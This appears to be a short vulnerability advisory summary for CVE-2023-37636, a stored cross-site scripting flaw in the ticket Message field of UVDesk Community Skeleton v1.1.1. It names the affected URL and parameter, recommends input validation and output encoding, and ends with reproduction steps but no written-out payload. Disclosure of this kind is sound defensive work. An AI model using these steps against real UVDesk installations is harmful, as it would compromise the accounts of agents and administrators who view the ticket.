CVE-2023-37636

An attacker who is logged into the UVDesk Community Skeleton v1.1.1 application can inject malicious JavaScript code into the "Message" input field when creating a ticket [ref_id=1]. The input is not properly sanitized, so the payload is stored on the server. Whenever any user (including other agents or administrators) views the ticket page, the stored script executes in their browser, leading to a persistent/stored XSS attack [ref_id=1].

The vulnerability resides in the "Message" field of the ticket creation form. The affected URL is `http://localhost/uvdesk-community/public/en/member/ticket/save` and the affected parameter is `reply` [ref_id=1]. The application fails to sanitize user-supplied input before storing it.

No patch is provided in the bundle. The advisory recommends implementing proper input validation and output encoding to prevent malicious code from being injected into the web application [ref_id=1]. Specifically, server-side validation should sanitize user input before it is stored in the database, and output encoding should ensure that any user input displayed on the web page is properly encoded to prevent script execution [ref_id=1].

Step-1: While logged in to the application, navigate to `http://localhost/uvdesk-community/public/en/member/tickets` and click on create ticket [ref_id=1]. Inject a malicious JavaScript payload into the "Message" field and submit the ticket. The payload will be stored and executed whenever the ticket page is accessed.